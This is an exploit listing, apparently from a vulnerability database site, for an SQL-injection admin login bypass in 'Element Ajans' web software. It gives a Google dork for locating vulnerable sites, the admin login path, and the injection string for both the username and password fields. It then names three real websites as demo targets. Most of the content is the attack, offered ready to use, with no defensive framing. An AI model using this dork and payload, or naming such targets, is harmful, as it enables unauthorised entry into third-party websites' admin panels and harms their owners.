Element Ajans Admin ByPass Injection

2018.05.12
tr Gaddar (TR) tr
Risk: Medium
Local: No
Remote: Yes
CVE: N/A
CWE: N/A

Author : Gaddar Youtube : https://www.youtube.com/channel/UChi1eZZ53Wc4etdGcuWJqTA/videos?view_as=subscriber Exploit Risk : Medium Exploit ; Search Google Dork : intext:"Copyright © Element Ajans" Open Target Go To The Admin Panel Panel : http://target.com/admin/login.php Admin Login : '=' 'or' Admin Passwd : '=' 'or' Demo Target's ; http://www.antalyasoforlerodasi.com.tr/ http://mevlanareklam.com.tr/ http://tektatpastaneleri.com/


Vote for this issue:
0%
100%


 

Thanks for you vote!


 

Thanks for you comment!
Your message is in quarantine 48 hours.

Comment it here.


(*) - required fields.  
{{ x.nick }} | Date: {{ x.ux * 1000 | date:'yyyy-MM-dd' }} {{ x.ux * 1000 | date:'HH:mm' }} CET+1
{{ x.comment }}

Copyright 2024, cxsecurity.com

 

Back to Top